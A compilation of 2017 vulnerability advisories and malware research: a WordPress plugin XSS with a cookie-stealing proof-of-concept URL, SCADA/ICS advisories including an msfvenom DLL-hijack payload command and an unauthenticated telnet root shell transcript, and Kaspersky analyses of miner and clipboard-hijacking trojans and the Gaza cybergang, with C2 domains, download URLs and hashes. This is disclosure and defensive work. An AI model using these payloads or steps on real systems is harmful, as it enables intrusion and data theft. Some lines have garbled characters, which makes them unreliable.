WordPress User Login History 1.5.2 Cross Site Scripting

Product: User Login History WordPress Plugin – https://wordpress.org/plugins/user-login-history/
Vendor: Er Faiyaz Alam
Tested version: 1.5.2
CVE ID: CVE-2017-15867

** CVE description **
Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php.

** Technical details **
The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the “> (%22%3E) expression and inject arbitrary HTML/JavaScript code.

Example of the vulnerable code with the date_from parameter (line 21):
<td><input readonly=”readonly” autocomplete=”off” placeholder=”<?php _e(“From”, “user-login-history”) ?>” id=”date_from” name=”date_from” value=”<?php echo isset($_GET[‘date_from’]) ? $_GET[‘date_from’] : “” ?>” class=”textfield-bg”></td>

** Proof of Concept **
Example using the user_id parameter:
http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

** Solution **
Update to version 1.6.

** Timeline **
15/10/2017: vendor contacted
15/10/2017: vendor acknowledgment
18/10/2017: fix pushed to GitHub
30/10/2017: fixed release available on WordPress Plugins Store.

** Credits **
Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).

** References **
– WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements
https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741

Best Regards,

Nicolas Buzy-Debat
Orange Cyberdefense Singapore (CERT-LEXSI)
_________________________________________________________________________________________________________________________

Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc
pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler
a l’expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d’alteration,
Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci.

This message and its attachments may contain confidential or privileged information that may be protected by law;
they should not be distributed, used or copied without authorisation.
If you have received this email in error, please notify the sender and delete this message and its attachments.
As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified.
Thank you.

ABB FOX515T

CVSS v3 6.2

ATTENTION: Low skill level to exploit.

Vendor: ABB

Equipment: FOX515T

Vulnerability: Improper Input Validation

AFFECTED PRODUCTS

The following versions of FOX515T, a communication interface, are affected:

  • FOX515T release 1.0

IMPACT

Successful exploitation of this vulnerability could allow for a local attacker to craft a malicious script that would enable retrieval of any file on the server.

MITIGATION

ABB reports that the product has been phased out and has reached obsolete status. No further maintenance is planned for the product.

Please see the ABB Cyber Security Advisory 1KHW028693 on the ABB Alerts and Notification page at the following location:

http://new.abb.com/about/technology/cyber-security/alerts-and-notifications

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:

  1. Do not click web links or open unsolicited attachments in email messages.
  2. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  3. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target this vulnerability. This vulnerability is not remotely exploitable.

VULNERABILITY OVERVIEW

An improper input validation vulnerability has been identified, allowing a local attacker to provide a malicious parameter to the script that is not validated by the application, This could enable the attacker to retrieve any file on the server.

CVE-2017-14025 has been assigned to this vulnerability. A CVSS v3 base score of 6.2 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

RESEARCHER

Ketan Bali reported the vulnerability to ABB.

BACKGROUND

Critical Infrastructure Sector(s): Communications

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Switzerland

Trihedral Engineering Limited VTScada

CVSS v3 7.8

ATTENTION: Low skill level to exploit.

Vendor: Trihedral Engineering Limited

Equipment: VTScada

Vulnerabilities: Improper Access Control, Uncontrolled Search Path Element

AFFECTED PRODUCTS

Trihedral Engineering Limited reports that the vulnerability affects the following versions of the VTScada HMI and SCADA software:

  • VTScada 11.3.03 and prior.

IMPACT

Successful exploitation of these vulnerabilities may allow execution of arbitrary code.

MITIGATION

Trihedral Engineering Limited recommends that users of an affected version update to the latest version, 11.3.05. The update can be found at the following location:

ftp://ftp.trihedral.com/VTS/VTScada 11.3 Versions/

Help file notes for upgrading VTScada/VTS can be found at:

https://www.trihedral.com/help/Content/Op_Welcome/Wel_UpgradeNotes.htm

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should take the following measures to protect themselves from social engineering attacks:

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities. These vulnerabilities are not remotely exploitable.

VULNERABILITY OVERVIEW

A local, non-administrator user has privileges to read and write to the file system of the target machine.

CVE-2017-14031 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

The program will execute specially crafted malicious dll files placed on the target machine.

CVE-2017-14029 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

RESEARCHER

Karn Ganeshen and Mark Cross independently discovered these vulnerabilities and reported them to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Chemical, Communications, Critical Manufacturing, Energy, Food and Agriculture, Transportation Systems, Water and Wastewater Systems

Countries/Areas Deployed: North America, Europe

Company Headquarters Location: Canada

SpiderControl SCADA Web Server 2.02.0007 Improper Privilege Management

Vendor: SpiderControl
Equipment: SCADA Web Server
Vulnerability: Improper Privilege Management

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-spidercontrol-scada-web-server-improper-privilege-management-vulnerability/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-250-01

CVE-ID
CVE-2017-12728

————————
AFFECTED PRODUCTS
————————

The following versions of SCADA Web Server, a software management platform,
are affected:
SCADA Web Server Version 2.02.0007 and prior.

————————
BACKGROUND
————————
Critical Infrastructure Sector: Critical Manufacturing
Countries/Areas Deployed: Europe
Company Headquarters Location: Switzerland

————————
IMPACT
————————
Successful exploitation of this vulnerability could allow authenticated
system users to escalate their privileges under certain conditions.

————————
VULNERABILITY OVERVIEW
————————

IMPROPER PRIVILEGE MANAGEMENT CWE-269

Authenticated, non-administrative local users are able to alter service
executables with escalated privileges which could allow an attacker to
execute arbitrary code under the context of the current system services.

CVE-2017-12728 has been assigned to this vulnerability. A CVSS v3 base
score of 5.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).

————————
Vulnerability Details
————————

1. Untrusted Users Can Modify Windows Service Executables
It is possible for non-administrative local users to replace some of the
Windows Service executables with malicious programs. This could be abused
to execute programs with the privileges of the Windows services concerned.

The programs below have FILE_WRITE, WRITE_DAC or WRITE_OWNER permission
granted to non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_WRITE_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_WRITE_DATA

2. Delete Permission Granted On Windows Service Executables
It is possible for non-administrative local users to delete some of the
Windows Service executables with malicious programs. This could lead to
disruption or denial of service.

The programs below have DELETE permission granted to non-administrative
users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: DELETE
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
DELETE

3. Append Permission Granted Windows Service Executables
It is possible for non-administrative local users to append to some of the
Windows Service executables with malicious programs. This is unlikely to be
exploitable for .exe files, but is it bad security practise to allow more
access than necessary to low-privileged users.

The programs below have FILE_APPEND permission granted to
non-administrative users:

SCADA Server (SCADAServer) runs the following program as LocalSystem:

C:\WWW\ScadaWindowsService.exe: ALLOW \Everyone: FILE_APPEND_DATA
C:\WWW\ScadaWindowsService.exe: ALLOW NT AUTHORITY\Authenticated Users:
FILE_APPEND_DATA

+++++
Best Regards,
Karn Ganeshen

Progea Movicon 11.5.1181 Search Path Issues

Vendor: Progea
Equipment: Movicon SCADA/HMI
Vulnerability: Uncontrolled Search Path Element, Unquoted Search Path or
Element

Advisory URL
https://ipositivesecurity.com/2017/10/28/ics-progea-movicon-scadahmi-vulnerabilities/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-290-01

CVE-ID
CVE-2017-14017
CVE-2017-14019

————————
AFFECTED PRODUCTS
————————
The following versions of Movicon HMI, an HMI software platform, are
affected:
Movicon Version 11.5.1181 and prior.

————————
BACKGROUND
————————
Critical Infrastructure Sectors: Critical Manufacturing, Energy, Food and
Agriculture, Transportation Systems, Water and Wastewater Systems
Countries/Areas Deployed: Europe, India, and United States
Company Headquarters Location: Italy

————————
IMPACT
————————
Successful exploitation of these vulnerabilities could allow privilege
escalation or arbitrary code execution.

————————
VULNERABILITY OVERVIEW
————————

UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element vulnerability has been identified,
which may allow a remote attacker without privileges to execute arbitrary
code in the form of a malicious DLL file.

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Movicon SCADA/HMI. User interaction is required
to exploit this vulnerability in that the malicious dll file should be
saved in any of the DLL search paths.

The specific flaw exists within the handling of a specific named DLL file
used by Movicon SCADA/HMI. By placing specific DLL file (listed below), an
attacker is able to force the process to load an arbitrary DLL. This allows
an attacker to execute arbitrary code in the context of the process.

————————
DLL File Name (1)
————————
api-ms-win-appmodel-runtime-l1-1-0.dll

————————
Application Executables (that look for missing DLL)
————————
Movicon.exe
MoviconRunTime.exe
MoviconService.exe
AlarmsImpExp.exe
ReportViewerNET.exe

————————
Steps to reproduce
————————

1. Generate a dll payload
msfvenom ap windows/exec cmd=calc.exe af dll ao
api-ms-win-appmodel-runtime-l1-1-0.dll

2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\Program Files\Progea\Movicon11.5\

3. Run MoviconService.exe (or any of the above listed executables), and Exit

————————
CVE-2017-14017 has been assigned to this vulnerability. A CVSS v3 base
score of 6.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).

UNQUOTED SEARCH PATH OR ELEMENT CWE-428
An unquoted search path or element vulnerability has been identified, which
may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate his or her privileges.

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local useras code would execute with
the elevated privileges of the application.

aC/ MOVICON (MOVICON) runs as LocalSystem and has path: C:\Program
Files\Progea\Movicon11.5\MoviconService.exe:

CVE-2017-14019 has been assigned to this vulnerability. A CVSS v3 base
score of 6.5 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).

+++++

Best Regards,
Karn Ganeshen

JanTek JTC-200 RS232-NET Connector CSRF / Missing Authentication

Vendor: JanTek
Equipment: JTC-200
Vulnerabilities: Cross-site Request Forgery, Improper Authentication

Advisory URL:
https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02

CVE-ID
CVE-2016-5789
CVE-2016-5791

Detailed Proof of Concept:
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/

————————
AFFECTED PRODUCTS
————————

The following versions of JTC-200, a TCP/IP converter, are affected:
JTC-200 all versions.

————————
BACKGROUND
————————
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Europe and Asia
Company Headquarters Location: Taiwan

————————
IMPACT
————————
Successful exploitation of these vulnerabilities allow for remote code
execution on the device with elevated privileges.

————————
VULNERABILITY OVERVIEW
————————

CROSS-SITE REQUEST FORGERY (CSRF) CWE-352
An attacker could perform actions with the same permissions as a victim
user, provided the victim has an active session and is induced to trigger
the malicious request.

CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score
of 8.0 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

IMPROPER AUTHENTICATION CWE-287
The improper authentication could provide undocumented Busybox Linux shell
accessible over Telnet service without any authentication.

CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score
of 9.8 has been assigned; the CVSS vector string is
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

———
Trying IP…
Connected to IP.
Escape character is ‘^]’.
BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh)
Enter ‘help’ for a list of built-in commands.
#
BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary
Usage: busybox [function] [arguments]…
or: [function] [arguments]…
BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as.
Currently defined functions:
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi
#
# ls
bin dev etc nfs proc swap usb var
# cd etc
# ls
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services
# cat inetd.conf
telnet stream tcpnowait root /bin/telnetd
#
———

————————
Technical Details
————————
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/

+++++
Best Regards,
Karn Ganeshen

Protecting Critical Infrastructure from Cyber Threats

Original release date: October 31, 2017

October is National Cybersecurity Awareness Month, an annual campaign to raise awareness about cybersecurity. Building resilience in critical infrastructure is crucial to national security. The essential infrastructure systems that support our daily lives—such as electricity, financial institutions, and transportation—must be protected from cyber threats.

US-CERT encourages users and administrators to review the following:


This product is provided subject to this Notification and this Privacy & Use policy.

Tales from the blockchain

Cryptocurrency has gradually evolved from an element of a new world, utopian economy to a business that has affected even those sectors of society least involved in information technology. At the same time, it has acquired a fair number of “undesirable” supporters who aim to enrich themselves at the expense of other users: attackers who release miners embedded in user JS scripts, or plan to implement miners into IoT devices at the production stage; hidden in countless variations of Trojans in conjunction with SMB exploits etc.

We will tell you two unusual success stories that happened on the “miner front”. The first story echoes the TinyNuke event and, in many respects gives an idea of the situation with miners. The second one proves that to get crypto-currency, you don’t need to “burn” the processor.

DiscordiaMiner and fights on forums

In early June, our analysts found a new and seemingly unremarkable Trojan that unloaded the miner of the popular Montero crypto-currency. However, in the course of further research, we uncovered many interesting details that we would like to share with you.

Kaspersky Lab products detect this Trojan as Trojan.Win32.DiscordiaMiner. It works as follows:

  1. Creates a number of directories in the system to download the necessary files;
  2. Copies itself in C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe;
  3. Gets the update from the server;
  4. Creates an autorun task;
  5. Gets the miner files;
  6. Gets the credentials of the user in whose name it wants to run the mining;
  7. Starts the miner.

All interaction with the command server (C&C) occurs in the open, with the help of GET requests, without any check or verification. In all samples, the hxxp://api[.]boosting[.]online address is provided as the C&C. The line associated with the individual user (etc. MTn31JMWIT) and the address of the required resource – the list of files, the update, etc. – are added to the server address. Example: hxxp://api[.]boosting[.]online/MTn31JMWIT/getDiscordia

Discord on the forum

As mentioned above, at a certain point in its work, the Trojan is instructed to issue a command to run the miner: it specifies the email of the user who has “done the job”. It looks like this:

-user <user_email> -xmr

style=”text-align:center”>

Using the value of the <user_email> argument, with the first line of the search results we get the Trojan-related topic on the Russian-language forum:

On this forum thread there is a wide discussion of the Trojan’s work details. The most interesting part of the discussion is on page 21 – the forum participants accuse the Trojan’s author of substituting users’ addresses with his own. Among other things, there is also a dialogue on the chat app, Telegram where the author explains this substitution as a banal mistake.

On the forum, the author of DiscordiaMiner references the short lifespan of this error as an argument in his defense:

He also mentions the figure of 200,000 infected machines. It is difficult to say how true this is. However, in the malware samples we received, the email that the “prosecutor” refers to is often named. Examples of other addresses: ilya-soro*****[email protected], v*****[email protected], topne*****[email protected], J ***** m @ yandex.ru, steamfa*****[email protected], me*****[email protected], x*****[email protected], piedmont ***** lines @ yahoo. com.

Among other things, in the course of the dispute the author mentions that the source codes of the Trojan DiscordiaMiner are now publicly available.

Indeed, the first line of the search results provides the link to the author’s repository.


In addition to the source codes, which really do coincide fully with the restored Trojan code, the repository also includes very informative diagrams of the Trojan’s operation, the samples of documents used for distribution as well as instructions for how exactly the UAC is to be bypassed. The pictures below are taken from the repository (which is currently unavailable).


The source codes are presented in full and, apparently, only the user-associated string (ClientID) varies from assembly to assembly.

Although the “dumping” of program source code is not unique, this case in many respects echoes the NukeBot story – the same disputes on a forum followed by the publication of the source codes by the author with the aim of “protecting honor and dignity”. Another common feature is the “minimalistic” design of both Trojans: NukeBot could only embed web-based injections into the browser, while DiscordiaMiner can download and run files from a remote server. But we cannot say whether these two bots have any more specific connections.

MD5

00B35FB5C534DEA3EA13C8BE4E4585CC
083FD078FECFE156B17A50F73666B43E
0AB8E9C539554CBA532DFC5BC5E10F77
377B9C329EBF7ACFE7DABA55A0E90E98
48E6714A486B67D237B07A7CF586B765
4BD80738059B5D34837633692F18EA08
4E79B826AE4EC544481784EF77E05DE4
4EF5A04A56004AA93167F31296CCACF7
539B092C176183EDCA6A69421B62BCE8
5F8E4CF0971B543525CA807B6A2EC73F
65CF0CC192E69EA54373758C130A983F
7F65252701C80F8D4C1484EE06597DF0
80B04BBC2F18E3FE4625C3E060DA5465

CryptoShuffler

It’s extremely rare for authors of mining software to become fabulously wealthy. With a few exceptions, the wallets used by attackers contain a total of $50-100, received from all incoming transfers during the entire period of the Trojan’s work. However, there are those that do not go down the beaten path, and benefit from “alternative” ways. The authors of the CryptoShuffler Trojan belong in this category.

Kaspersky Lab products detect this Trojan as Trojan-Banker.Win32.CryptoShuffler.gen. MD5 of the file in question is 0ad946c351af8b53eac06c9b8526f8e4

The key feature of CryptoShuffler is the following: instead of wasting processor time on mining, the Trojan simply substitutes the sender’s address in the clipboard! That was once the case with WebMoney and Bitcoin, but this malware sample is aimed at all popular cryptocurrencies.

As usually happens in the beginning, the Trojan writes itself into the registry for autoloading.

In later versions of the Trojan, this procedure is slightly different – if the module is implemented as a dynamically loaded library, its further run at the start is performed using the rundll32 system utility. The name of the called procedure and, concurrently, the main function of the represented library is call_directx_9.

The Trojan creates a thread of execution, in which it maintains unchanged the autorun branch specified in the screenshot above.

The substitution itself is performed using the API binding functions OpenClipboard \ GetClipboardData \ SetClipboardData

The search for the corresponding wallet in the string received from the clipboard is performed using regular expressions. Most popular cryptocurrency wallets have a fixed constant at the beginning of the string and a certain length – it is easy to create regular expressions for them. For example, the address of Bitcoin-wallets can be easily recognized by the digit “1” or “3” at the beginning of the string.

The body of the Trojan stores the wallets, corresponding to the specified cryptocurrencies. The main list looks like this.

WALLET Currency name
1v9UCfygQf3toN1vA5xyr7LhKmv9QWcwZ  BITCOIN
D7uMywpgSyvy9J2RkyQ2oozT4xTmSSWGgR  DOGECOIN
LeHrMiPzEUtJen73T5P1bVG2tG8PerzFR1  LITECOIN
Xv4M3y36iu6Fc5ikk8XuQBDFMtRz2xFXKm  DASH
0xfb25b3d5ae0d6866da17c4de253ce439b71d0903  ETHEREUM
4ZFYNck6mZfG52RMdWThJEXq4Sjdszf719  MONERO
N6VeTbNiFG1oapzPZmeLLkkNC55FQGMTgr  ???
t1VVkuasB7pNHPES2ei6LCqP1hZWb5rfPrB  ZCASH
PM44dh7LNEjThgmscw8t5rb9LZqEPc2Upg  ???

The biggest profit reaches the cybercriminals’ pockets from the users of Bitcoin wallets – at the time of writing, there were ~ 23 BTC on the balance of their wallet, which at the end of October amounted to approximately $140,000. The amounts in the remaining wallets range from tens to thousands of US dollars.

The malware described is a perfect example of a “rational” gain. The scheme of its operation is simple and effective: no access to pools, no network interaction, and no suspicious processor load.

MD5

095536CA531AE11A218789CF297E71ED
14461D5EA29B26BB88ABF79A36C1E449
1A05F51212DEA00C15B61E9C7B7E647B
1E785429526CC2621BAF8BB05ED17D86
2028383D63244013AA2F9366211E8682
25BF6A132AAE35A9D99E23794A41765F
39569EF2C295D1392C3BC53E70BCF158
50E52DBF0E78FCDDBC42657ED0661A3E
6EB7202BB156E6D90D4931054F9E3439
7AE273CD2243C4AFCC52FDA6BF1C2833
7EC256D0470B0755C952DB122C6BDD0B
80DF8640893E2D7CCD6F66FFF6216016
AA46F95F25C764A96F0FB3C75E1159F8
B7ADC8699CDC02D0AB2D1BB8BE1847F4
D45B0A257F8A0710C7B27980DE22616E
D9A2CD869152F24B1A5294A1C82B7E85

Gaza Cybergang – updated 2017 activity

Summary information

Gaza cybergang is an Arabic politically motivated cyber criminal group, operating since 2012 and is actively targeting the MENA (Middle East North Africa) region. Gaza cybergang attacks have never slowed down, typical targets include: governments entities/embassies, oil and gaz, media/press, activists, politicians, diplomats.

One of the interesting new facts starting from Mid-2017 is their discovery inside an Oil and Gas organization in the MENA region, infiltrating systems and pilfering data for more than a year. Another interesting finding is the usage of the recent CVE 2017-0199 vulnerability and Microsoft Access files with embedded download scripts starting, helping attackers maintain low detection rates for the latter. Traces of mobile malware are also being investigated, which started showing up from in April 2017.

Recent targets by the group does seem to be varied in nature, attackers do not seem to be selectively choosing targets, but rather seeking different kinds of MENA intelligence.

Some of the interesting new updates about Gaza cybergang:

style=”margin-bottom:0!important”>

  • Gaza cybergang attackers have continued interest in governmental entities in MENA
  • New identified targets include Oil and Gaz in MENA
  • New tools and techniques include
    • Abuse of the CVE 2017-0199 vulnerability
    • Usage of macros inside Microsoft Access files, enabling lower detection rates
    • Possible Android mobile malware being used by attackers

Previous published research:
Gaza cybergang, where’s your IR team?

Kaspersky Lab products and services successfully detect and block Gaza cybergang attacks, detection names below:

style=”margin-bottom:0!important”>

  • HEUR:Exploit.MSOffice.Generic
  • HEUR:Trojan.Win32.Cometer.gen
  • HEUR:Trojan.Win32.Generic
  • Trojan-Downloader.Win32.Downeks
  • Trojan-Spy.MSIL.Downeks
  • Win32.Bublik
  • Win32.Agentb

More information about Gaza cybergang is available to customers of Kaspersky Intelligence Reporting Service. Contact: [email protected]

Technical details

Gaza cybergang attacks were previously surprisingly successful in utilising simple and common tools to achieve their goals, they rely on a variety of Remote Access Trojans (RATs), to perform their activities, including Downeks, Qasar, Cobaltstrike…

Though as recent as June 2017, attackers have started utilizing the CVE 2017-0199 vulnerability which enables direct code execution abilities from a Microsoft office document on non-patched victim systems(Cobaltstrike payload in this case). Another finding is a possible Android trojan that the attackers have positioned on one of their command servers starting from April 2017.

In most cases, malware is sent by email as compressed attachment or download links, in newer cases we have observed downloaders or Microsoft office documents with embedded macros being sent to victims starting from March 2017; when opened, the downloader would contact a URL or IP address to retrieve the actual payload. Once executed successfully, the malware grants full access to the attackers, providing them with the ability to collect files, keystrokes and screenshots from victim’s devices. If the initial downloaded malware was detected on the victim, the downloader would attempt to retrieve other malware files to victim’s device, in a attempt for one of those files to work.

The full list of indicators of compromise (IOCs) can be found in Appendix I. The list of the most interesting lure content, malware files and related droppers, command servers can be found in Appendix II.

Summary of recent campaigns

Below can be found the list of recent findings related to Gaza cybergang operations:

Command and control server Hash First seen File name/Social engineering lure
upgrade.newshelpyou[.]com 552796e71f7ff304f91b39f5da46499b 25-07-2017 nvStView.exe
6fba58b9f9496cc52e78379de9f7f24e 23-03-2017 صور خاصة.exe
(Translation: Special photos)
eb521caebcf03df561443194c37911a5 03-04-2017 صور خاصة.exe
(Translation: Special photos)
moreoffer[.]life 66f144be4d4ef9c83bea528a4cd3baf3 27-05-2017 تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe
(Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency)
3ff60c100b67697163291690e0c2c2b7 11-05-2017 MOM.InstallProxy.exe
b7390bc8c8a9a71a69ce4cc0c928153b 05-04-2017 تعرف على المنقبة التي أساءت للسعودية
(Translation: Learn about the woman wearing niqab which offended Saudi)
f43188accfb6923d62fe265d6d9c0940 21-03-2017 Gcc-Ksa-uae.exe
056d83c1c1b5f905d18b3c5d58ff5342 16-03-2017 مراسلة بخصوص اجتماع رؤساء البعثات.exe
(Translation: Correspondence regarding the meeting of Heads of Missions)
138.68.242[.]68 87a67371770fda4c2650564cbb00934d 20-06-2017 hamas.doc
نقاط اتفاق حماس وتيار فتح الاصلاحي.doc
(Translation: the points of agreement between Hamas and the reformist Fateh movement)
محضر اجتماع مركزية فتح الليلة.doc
(Translation: minutes of the tonight meeting)
سلفة أم راتب للموظفين يوم الثلاثاء المقبل؟.doc
(Translation: An advance on salary or full salary for employees next Tuesday?)
lol.mynetav[.]org 4f3b1a2088e473c7d2373849deb4536f 20-06-2017 Notepad.exe
attachment.scr
https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU
signup.updatesforme[.]club 7d3426d8eb70e4486e803afb3eeac14f 04-05-2017 Palestinian Retirement Authority Ramallah.exe
0ee4757ab9040a95e035a667457e4bc6 27-04-2017 27-4-2017 Fateh Gaza plo.exe
ping.topsite[.]life b68fcf8feb35a00362758fc0f92f7c2e 19-03-2017 Downloaded by Macro in MDB files:
http://download.data-server.cloudns[.]club/indexer.exe
7bef124131ffc2ef3db349b980e52847 13-03-2017 الأخ اسماعيل هنية -نائب رئيس المكتب السياسي .exe
(Translation: Brother Ismail Haniyeh – Deputy Head of the Political Bureau)
d87c872869023911494305ef4acbd966 19-03-2017 Downloaded by Macro in MDB files: http://download.data-server.cloudns[.]club/wordindexer.exe
a3de096598e3c9c8f3ab194edc4caa76 12-04-2017 viewimages.exe
c078743eac33df15af2d9a4f24159500 28-03-2017 viewimages.exe
70d03e34cadb0f1e1bc6f4bf8486e4e8 30-03-2017 download-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe
67f48fd24bae3e63b29edccc524f4096 17-04-2017 http://alasra-paper.duckdns[.]org/send/رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.rar
(Message from President Abu Mazen to Hamas in Gaza Strip)
7b536c348a21c309605fa2cd2860a41d 17-04-2017 http://alasra-paper.duckdns[.]org/send/ورقة_الاسرى_المقدمة_لفك_الاضراب .rar
(Translation: captives paper submitted to stop the strike)
alasra-paper.duckdns[.]org Mobile malware N/A 23-04-2017 Possible Android malware. http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse.com/Dont-Starve-Pocket-Edition-1.04_ApkHouse.com.apk
hamas-wathaq.duckdns[.]org cf9d89061917e9f48481db80e674f0e9 16-04-2017 وثائق تنشر لأول مره عن حكم حماس لقطاع غزه .exe
(Translation: Documents published for the first time on Hamas ruling of Gaza Strip)
manual.newphoneapp[.]com 86a89693a273d6962825cf1846c3b6ce 02-02-2017 SQLiteDatabaseBrowserPortable.exe
3f67231f30fa742138e713085e1279a6 02-02-2017 SQLiteDatabaseBrowserPortable.exe

The above listed files are further described in Appendix 1.

New findings

Gaza Cybergang attackers have been continuously evolving their skills on different levels, utilising new methods and techniques to deliver malware in addition to politically adapting social engineering decoys to regional political and humanitarian occurrences.

One of the interesting new facts starting from Mid-2017 is their discovery inside an Oil and Gas organization in the MENA region, infiltrating systems and pilfering data for more than a year, malware files found were found to be from our previously published research

While traces of Android mobile malware have been witnessed, attackers have continuously utilized the Downeks downloader and the Quasar or Cobaltstrike to target Windows devices, enabling them remote access spying and data exfiltration abilities, though now more efficient when utilizing the CVE 2017-0199 vulnerability which enables direct code execution abilities from a Microsoft office document on non-patched victim Windows systems. The use of Microsoft Access database files have also enabled the attackers to maintain low levels of detection, as it’s not an uncommon method to deliver malware.

These developments have helped the attackers continue their operations, targeting a variety of victims and organizations, sometimes even bypassing defences and persisting for prolonged periods.

1. The extended utilisation of humanitarian and political social engineering causes in the attacks

Attackers have continuously targeted victims and organizations in government entities/embassies, oil and gas, media/press, activists, politicians, diplomats.

